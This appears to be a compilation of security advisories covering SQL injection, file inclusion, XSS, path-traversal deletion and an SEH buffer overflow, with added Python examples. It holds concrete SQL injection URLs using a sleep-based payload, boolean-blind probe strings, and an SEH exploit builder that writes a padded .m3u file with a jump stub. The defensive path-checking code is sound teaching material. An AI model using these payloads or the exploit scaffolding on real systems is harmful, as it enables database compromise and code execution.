When an authenticated user navigates to 'Settings/Translations' and clicks the 'Update Filter' button, the following GET request is sent to the server: http://127.0.0.1/private/en/locale/index?form=filter&form_token=408d28a8cbab7890c11b20af033c486b&application=&module=&type%5B%5D=act&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value= The language[] parameter is prone to boolean-based blind and stacked-query SQL injection. The type[] parameters are injectable as well: the following payload closes the string literal in type[] and appends a subselect that calls sleep(10), delaying the response by an additional 10 seconds: http://127.0.0.1/private/en/locale/index?form=filter&form_token=68aa8d273e0bd95a70e67372841603d5&application=&module=&type%5B%5D=act%27%2b(select%20*%20from%20(select(sleep(10)))a)%2b%27&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value=
The Database::escape_string() function is used to sanitize data, but it is only effective when the escaped value is placed inside quotation marks in the query ('function_output' or "function_output"). There are a few places where it is used without surrounding quotation marks, so the escaped value is still parsed as SQL. The first exploit requires teacher privileges (api_is_allowed_to_edit(false, true)) and at least one existing forum category (get_forum_categories()). The second exploit requires administrator privileges (there is no CSRF protection).
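As an added illustration of the two injection patterns above (this is not code from either advisory or from the affected products), the following Python script builds a small in-memory SQLite table, whose name and rows are assumptions for this example, and compares four ways of building the query: an unescaped value inside quotes (the first advisory), an escaped value outside quotes (the second advisory), an escaped value inside quotes, and a bound parameter. A boolean-based blind probe of the kind used to find such bugs is run against each. SQLite escapes a quote by doubling it where MySQL's escape_string() uses a backslash, but the conclusion is the same: escaping only protects a value that sits inside a quoted literal.

```python
import sqlite3

# Constructed sample rows; the table loosely mirrors the locale filter from
# the first advisory but its layout and contents are an assumption.
ROWS = [
    (1, "act", "en", "login", "Log in"),
    (2, "err", "en", "login_failed", "Login failed"),
    (3, "lbl", "fr", "login", "Connexion"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE locale(id INTEGER, type TEXT, language TEXT, name TEXT, value TEXT)"
    )
    conn.executemany("INSERT INTO locale VALUES (?, ?, ?, ?, ?)", ROWS)
    return conn


def escape_string(value):
    """Stand-in for Database::escape_string(): SQLite doubles a single quote
    where MySQL backslash-escapes it. Either way the result is only safe when
    it is written *inside* a quoted string literal."""
    return value.replace("'", "''")


def ids(conn, sql, params=()):
    return [row[0] for row in conn.execute(sql, params)]


def quoted_unescaped(conn, type_value):
    # Pattern from the first advisory: raw input spliced into a quoted literal.
    return ids(conn, f"SELECT id FROM locale WHERE type = '{type_value}'")


def quoted_escaped(conn, type_value):
    # escape_string() used as intended: the value is escaped AND quoted.
    return ids(conn, f"SELECT id FROM locale WHERE type = '{escape_string(type_value)}'")


def unquoted_escaped(conn, id_value):
    # Pattern from the second advisory: escaped, but with no quotes around it,
    # so the escaping has nothing to protect and the input is parsed as SQL.
    return ids(conn, f"SELECT id FROM locale WHERE id = {escape_string(id_value)}")


def parameterised(conn, id_value):
    # The fix: the driver binds the value; it can never become SQL syntax.
    return ids(conn, "SELECT id FROM locale WHERE id = ?", (id_value,))


def is_injectable(run, base, true_suffix, false_suffix):
    """Boolean-based blind check. If the input is treated as data, appending a
    condition changes the value being matched and so the result set; if the
    condition is evaluated by the database, the TRUE variant reproduces the
    baseline result while the FALSE variant empties it."""
    baseline = run(base)
    r_true = run(base + true_suffix)
    r_false = run(base + false_suffix)
    return r_true == baseline and r_false != r_true


if __name__ == "__main__":
    db = make_db()
    str_probe = ("act", "' AND '1'='1", "' AND '1'='2")
    num_probe = ("1", " AND 1=1", " AND 1=2")
    print("quoted, unescaped :", is_injectable(lambda v: quoted_unescaped(db, v), *str_probe))
    print("quoted, escaped   :", is_injectable(lambda v: quoted_escaped(db, v), *str_probe))
    print("unquoted, escaped :", is_injectable(lambda v: unquoted_escaped(db, v), *num_probe))
    print("parameterised     :", is_injectable(lambda v: parameterised(db, v), *num_probe))
    print("dump via unquoted :", unquoted_escaped(db, "0 OR 1=1"))
```

The numeric probe uses no quote at all, which is why escape_string() never sees anything to escape in the unquoted case; casting to int or binding the parameter are the only fixes that hold there.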
StaMPi is vulnerable to local file inclusion (LFI). An attacker can exploit this by requesting a crafted URL whose file-path parameter is passed to an include without validation, so that an arbitrary local file is included by the application. This can lead to the disclosure of sensitive information such as the contents of /etc/passwd.
u5CMS is a small, handy content management system for medium-sized websites, conference/congress/submission administration, review processes, personalized serial mails, PayPal payments and online surveys, based on PHP, MySQL and Apache. u5CMS suffers from multiple stored and reflected cross-site scripting vulnerabilities. Input passed to several POST and GET parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
u5CMS suffers from an authenticated local file inclusion (LFI) vulnerability: input passed through the 'f' parameter to the thumb.php script is not properly verified before being used to include files. This can be exploited to include local files by their absolute path or via directory traversal sequences.
Input passed via multiple parameters in multiple scripts is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Input passed to the 'f' parameter in 'deletefile.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected GET parameter.
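The three file-path issues above (StaMPi's include, u5CMS's thumb.php include and deletefile.php's delete, each driven by a parameter that accepts an absolute path or ../ sequences) share one root cause and one fix. As an added example, not code from any of these products, the Python below resolves a user-supplied name against an allowed base directory and refuses anything that escapes it; the upload directory and file names in demo() are constructed in a temporary directory purely for the demonstration.

```python
import os
import tempfile


def resolve_under(base_dir, user_path):
    """Return the absolute path of user_path inside base_dir, or None if the
    request would escape base_dir. An absolute user path is anchored under
    base_dir rather than honoured, and containment is checked after realpath()
    so '..' segments and symlinks are resolved before the test."""
    base = os.path.realpath(base_dir)
    # Strip leading separators so os.path.join cannot be overridden by an
    # absolute user path such as /etc/passwd.
    relative = user_path.lstrip("/\\")
    candidate = os.path.realpath(os.path.join(base, relative))
    # commonpath() on the two resolved paths is the containment test; a plain
    # startswith() check would wrongly accept /srv/files_other for /srv/files.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def read_upload(base_dir, user_path):
    """What an include or thumbnail handler should do: resolve, then open."""
    path = resolve_under(base_dir, user_path)
    if path is None or not os.path.isfile(path):
        raise PermissionError(f"refusing {user_path!r}: outside {base_dir}")
    with open(path, "rb") as fh:
        return fh.read()


def delete_upload(base_dir, user_path):
    """What a deletefile handler should do: same containment test, then unlink."""
    path = resolve_under(base_dir, user_path)
    if path is None or not os.path.isfile(path):
        return False
    os.remove(path)
    return True


def demo():
    """Constructed layout: <tmp>/uploads/pic.jpg plus a sibling secret.txt
    that traversal or an absolute path would otherwise reach."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.makedirs(uploads)
    with open(os.path.join(uploads, "pic.jpg"), "wb") as fh:
        fh.write(b"JPEGDATA")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "wb") as fh:
        fh.write(b"SECRET")

    def readable(p):
        try:
            read_upload(uploads, p)
            return True
        except PermissionError:
            return False

    return {
        "plain": read_upload(uploads, "pic.jpg"),
        "traversal_resolves": resolve_under(uploads, "../secret.txt"),
        "traversal_readable": readable("../secret.txt"),
        "absolute_readable": readable(secret),
        "deleted": delete_upload(uploads, "pic.jpg"),
        "delete_traversal": delete_upload(uploads, "../secret.txt"),
        "secret_survives": os.path.isfile(secret),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:20s} {value!r}")
```

The order matters: realpath() first, then the commonpath() comparison, then the existence check. Testing the raw string for "../" before resolution is the check these advisories show being skipped or done badly, and it misses encoded or symlinked variants.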
A memory corruption vulnerability exists in Chemtool 1.6.14. An attacker can crash the application with a crafted input file, and also by supplying an overly long filename.
A SQL Injection vulnerability exists in Redaxscript CMS 2.2.0. The vulnerable parameter is the 'search_terms' parameter in the 'search_post()' function of the 'redaxscript/includes/search.php' file. An attacker can send a maliciously crafted POST request to the vulnerable application to execute arbitrary SQL commands in the back-end database.
MooPlayer 1.3.0 is vulnerable to an SEH-based buffer overflow. The vulnerability is triggered when a specially crafted .m3u file is opened in the application: the overflow overwrites the SEH chain, so both the nSEH pointer and the SEH handler address are attacker-controlled, the stack is filled with the 'A' (0x41) padding from the file, and the registers are also overwritten with the 'C' (0x43) padding and the nSEH value.
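As an added example (not from the MooPlayer advisory or any published exploit for it), the script below reproduces the two steps a practitioner takes after seeing the overwrite described above: generate a cyclic pattern instead of the uniform 'A' padding so that the bytes landing in nSEH and SEH identify their own offset, then lay out the .m3u payload once that offset is known. The offset, nSEH and SEH values used in the demo call are placeholders chosen for illustration, not the real ones for MooPlayer.

```python
import string


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): every 3-byte window is
    unique within the first 20280 bytes, so any 4 bytes read back from a
    register or from the SEH record map to exactly one offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern, value):
    """value is either the 4 characters seen in a memory dump or the DWORD as
    shown in a register/SEH view (e.g. '0x41346141'), which is stored
    little-endian and therefore reversed before searching.
    Returns the offset, or -1 if the value does not occur in pattern."""
    if value.lower().startswith("0x"):
        value = bytes.fromhex(value[2:])[::-1].decode("ascii")
    return pattern.find(value)


def build_m3u_payload(offset, nseh, seh, total_length):
    """Classic SEH layout: junk up to the exception record, 4-byte nSEH,
    4-byte SEH, then filler. The advisory's observation that the stack holds
    'A's and the registers 'C's corresponds to this junk/filler split."""
    if len(nseh) != 4 or len(seh) != 4:
        raise ValueError("nSEH and SEH must each be exactly 4 bytes")
    filler_len = total_length - offset - 8
    if filler_len < 0:
        raise ValueError("total_length too small for offset + 8")
    return b"A" * offset + nseh + seh + b"C" * filler_len


if __name__ == "__main__":
    # Step 1: crash the target with a pattern-filled .m3u instead of 'A's.
    with open("crash.m3u", "wb") as fh:
        fh.write(pattern_create(5000).encode("ascii"))
    # Step 2: feed the nSEH value observed in the debugger back in.
    offset = pattern_offset(pattern_create(5000), "0x41346141")  # placeholder
    # Step 3: placeholder nSEH (short jump over the handler) and SEH bytes;
    # a real exploit would put a POP POP RET address in the SEH slot.
    payload = build_m3u_payload(offset, b"\xeb\x06\x90\x90", b"\x41\x41\x41\x41", 5000)
    with open("exploit.m3u", "wb") as fh:
        fh.write(payload)
```

Uniform 'A' padding, as in the crash the advisory describes, tells you the overwrite happened but not where; the cyclic pattern answers the "where" in one extra crash.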